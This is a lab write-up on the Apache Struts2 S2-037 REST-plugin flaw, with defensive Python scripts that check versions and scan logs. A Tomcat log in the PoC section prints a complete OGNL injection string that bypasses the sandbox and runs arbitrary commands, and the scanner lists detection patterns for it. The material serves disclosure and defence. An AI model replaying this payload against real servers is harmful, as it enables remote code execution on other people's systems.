Apache Struts2 vulnerability CVE-2016-4438 (S2-037): overview and hands-on lab



 

1. Overview

- When the REST Plugin is in use, a remote attacker can execute arbitrary code by supplying a crafted expression



2. Affected versions

- Apache Struts 2.3.20 through 2.3.28.1 (affected only when the REST Plugin is in use)



3. Release date

2016/05/02



4. Mitigation

- Upgrade to Apache Struts 2.3.29

- Upgrading to Apache Struts 2.3.29 may cause compatibility problems with existing OGNL expressions
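A quick way to act on sections 2 and 4 together is to check a deployment's WEB-INF/lib listing against the affected range. The script below is an added example, not code from the original post or from the Struts project: the range 2.3.20 through 2.3.28.1 and the fixed release 2.3.29 are taken from the text above, the "only with the REST Plugin" condition is enforced by requiring the plugin jar to be present, and the jar names assume the standard Struts 2 artifact naming (struts2-core-<ver>.jar, struts2-rest-plugin-<ver>.jar). The sample listing is constructed to match the lab victim (Struts 2.3.28).

```python
"""Decide whether a Struts 2 deployment falls in the S2-037 affected range.

Added example, not part of the original post. Range 2.3.20..2.3.28.1 and fixed
release 2.3.29 come from the advisory text; the REST plugin jar must also be
present, because the page notes the bug only applies with that plugin deployed.
Jar naming follows standard Struts 2 artifacts; the listing below is constructed.
"""
import re
from typing import Iterable, Optional, Tuple

Version = Tuple[int, ...]

AFFECTED_MIN: Version = (2, 3, 20)
AFFECTED_MAX: Version = (2, 3, 28, 1)
FIXED: Version = (2, 3, 29)

# Only the two artifacts that matter for this advisory
JAR_RE = re.compile(r"^(struts2-core|struts2-rest-plugin)-(\d+(?:\.\d+)*)\.jar$")


def parse_version(text: str) -> Version:
    """'2.3.28.1' -> (2, 3, 28, 1). Python compares tuples element by element and
    treats a shorter prefix as smaller, so (2,3,28) < (2,3,28,1) < (2,3,29)."""
    return tuple(int(p) for p in text.strip().split("."))


def in_affected_range(version: Version) -> bool:
    """True for 2.3.20 <= version <= 2.3.28.1 (inclusive on both ends)."""
    return AFFECTED_MIN <= version <= AFFECTED_MAX


def assess_lib_dir(jar_names: Iterable[str]) -> dict:
    """Inspect a WEB-INF/lib listing: which struts2-core is present, whether the
    REST plugin jar is present, and whether that combination is exposed to S2-037."""
    core: Optional[Version] = None
    rest_plugin = False
    for name in jar_names:
        m = JAR_RE.match(name)
        if not m:
            continue
        artifact, ver = m.group(1), parse_version(m.group(2))
        if artifact == "struts2-core":
            core = ver
        else:
            rest_plugin = True
    vulnerable = core is not None and rest_plugin and in_affected_range(core)
    return {
        "core": core,
        "rest_plugin": rest_plugin,
        "vulnerable": vulnerable,
        "upgrade_to": FIXED if vulnerable else None,
    }


# Constructed listing matching the lab victim above (Struts 2.3.28 + REST plugin)
SAMPLE_LIB = [
    "struts2-core-2.3.28.jar",
    "struts2-rest-plugin-2.3.28.jar",
    "xwork-core-2.3.28.jar",
    "ognl-3.0.14.jar",
]

if __name__ == "__main__":
    print(assess_lib_dir(SAMPLE_LIB))
```

For the lab victim this reports the core as (2, 3, 28) with the REST plugin present and flags it as vulnerable; the same listing without the REST plugin jar, or with both jars at 2.3.29, comes back clean. Because the plugin jar is checked by name, a renamed or shaded copy would be missed, so treat a clean result as a hint rather than proof.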



5. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4438

https://nvd.nist.gov/vuln/detail/CVE-2016-4438

https://cwiki.apache.org/confluence/display/WW/S2-037



6. PoC (Proof of Concept)

 

1) Victim environment

- Windows 10 Pro

- Java 1.7.8_80

- Apache Tomcat 7.0.54

- Apache Struts 2.3.28



2) Attacker environment

- CentOS 6 x64



3) Vulnerability scanning



4) Exploit



5) catalina.out log


1 11, 2018 2:26:01 오후 org.apache.struts2.rest.RestActionInvocation error
심각: Exception processing the result.
java.lang.IllegalStateException: getWriter() has already been called for this response
        at org.apache.catalina.connector.Response.getOutputStream(Response.java:602)
        at org.apache.catalina.connector.ResponseFacade.getOutputStream(ResponseFacade.java:196)
        at org.apache.struts2.rest.DefaultContentTypeHandlerManager.handleResult(DefaultContentTypeHandlerManager.java:187)
        at org.apache.struts2.rest.RestActionInvocation.executeResult(RestActionInvocation.java:232)
        at org.apache.struts2.rest.RestActionInvocation.processResult(RestActionInvocation.java:197)
        at org.apache.struts2.rest.RestActionInvocation.invoke(RestActionInvocation.java:145)
        at com.opensymphony.xwork2.DefaultActionProxy.execute(DefaultActionProxy.java:147)
        at org.apache.struts2.dispatcher.Dispatcher.serviceAction(Dispatcher.java:567)
        at org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction(ExecuteOperations.java:81)
        at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:99)
        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
        at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220)
        at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)
        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:501)
        at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:171)
        at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)
        at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:950)
        at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
        at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:408)
        at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1040)
        at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:607)
        at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:314)
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)
        at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
        at java.lang.Thread.run(Thread.java:745)

1 11, 2018 2:26:01 오후 org.apache.struts2.rest.RestActionInvocation info
정보: Executed action [/orders!(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#wr=#context[#parameters.obj[0]].getWriter(),#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()),#wr.println(#rs),#wr.flush(),#wr.close()):xx.toString!json!200] took 135 ms (execution: 49 ms, result: 86 ms)
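The two records above are the footprint a defender gets for free: the REST plugin logs every request as `Executed action [<path>!<method>!<ext>!<status>]`, and because the injected expression ran inside the method segment, the whole expression lands in catalina.out; the `getWriter() has already been called` exception is the side effect of the expression grabbing the response writer before the plugin tried to open its own output stream. The scanner below is an added example, not code from the original post or from the Struts project. It goes slightly beyond the single record shown here: besides matching indicator substrings taken from that record, it flags any method segment that is not a plain Java identifier and any OGNL static reference of the form `@Class@member`, which catches variants that rename the intermediate variables. The sample log lines are constructed and use English log levels; the victim's localized prefixes (`정보:`, `심각:`) do not affect the matching, which keys on the `Executed action [` text.

```python
"""Scan catalina.out for OGNL injection through the Struts REST plugin action name.

Added example, not part of the original post. Built around the two records shown
above: RestActionInvocation logs "Executed action [<path>!<method>!<ext>!<status>]",
and a hijacked response leaves "getWriter() has already been called" behind.
Sample log lines are constructed; indicator substrings come from the post's log.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

EXECUTED_RE = re.compile(r"Executed action \[(?P<action>.+)\] took (?P<ms>\d+) ms")
JAVA_IDENT = re.compile(r"^[A-Za-z_$][\w$]*$")   # what a legitimate method name looks like
OGNL_STATIC = re.compile(r"@[\w.]+@\w+")          # OGNL static reference: @some.Class@member
WRITER_ERROR = "getWriter() has already been called for this response"

# Substrings from the expression logged above, grouped by what each part achieves
INDICATORS = {
    "sandbox_bypass": ("#_memberAccess", "@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS"),
    "process_exec": ("@java.lang.Runtime@getRuntime()", ".exec("),
    "response_hijack": ("#context[", ".getWriter()"),
}


@dataclass
class Finding:
    line_no: int
    path: str
    method: str
    reasons: List[str] = field(default_factory=list)


def parse_action(action: str) -> Tuple[str, str]:
    """Split '/orders!<method>!json!200' into (path, method). Extension and status
    are peeled off from the right, so the method segment keeps any '!' it contains."""
    parts = action.rsplit("!", 2)
    path_and_method = parts[0] if len(parts) == 3 else action
    path, _, method = path_and_method.partition("!")
    return path, method


def analyze_line(line_no: int, line: str) -> Optional[Finding]:
    """Return a Finding for a suspicious 'Executed action' record, else None."""
    m = EXECUTED_RE.search(line)
    if not m:
        return None
    action = m.group("action")
    path, method = parse_action(action)
    f = Finding(line_no, path, method)
    # Payload-independent signal: the method segment is not a plain identifier
    if method and not JAVA_IDENT.match(method):
        f.reasons.append("non_identifier_method")
    if OGNL_STATIC.search(action):
        f.reasons.append("ognl_static_reference")
    for label, needles in INDICATORS.items():
        if any(n in action for n in needles):
            f.reasons.append(label)
    return f if f.reasons else None


def scan_log(lines: List[str]) -> List[Finding]:
    """One Finding per suspicious record, in file order (1-based line numbers)."""
    out: List[Finding] = []
    for i, line in enumerate(lines, 1):
        f = analyze_line(i, line)
        if f:
            out.append(f)
    return out


def count_writer_errors(lines: List[str]) -> int:
    """Corroborating signal: the expression called getWriter(), so the plugin's
    later getOutputStream() fails. Not proof alone, but worth correlating."""
    return sum(1 for ln in lines if WRITER_ERROR in ln)


# Constructed sample: a benign request, the exception, then a record shaped like
# the one in the post (intermediate variable renamed to show the generic checks).
SAMPLE_LOG = [
    "INFO: Executed action [/orders!index!json!200] took 12 ms (execution: 4 ms, result: 8 ms)",
    "SEVERE: Exception processing the result.",
    "java.lang.IllegalStateException: getWriter() has already been called for this response",
    "INFO: Executed action [/orders!(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
    "?(#rs=@java.lang.Runtime@getRuntime().exec(#parameters.command[0])):xx.toString!json!200]"
    " took 135 ms (execution: 49 ms, result: 86 ms)",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.path} method={f.method[:40]!r} reasons={f.reasons}")
    print("getWriter() collisions:", count_writer_errors(SAMPLE_LOG))
```

Run against the sample, only the fourth line is reported, with the non-identifier method, the static reference, the sandbox bypass and the process execution all listed, and one writer collision is counted. Feeding a real catalina.out in with `scan_log(open(path).read().splitlines())` works the same way; the identifier check is the one to keep even if the substring list goes stale.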



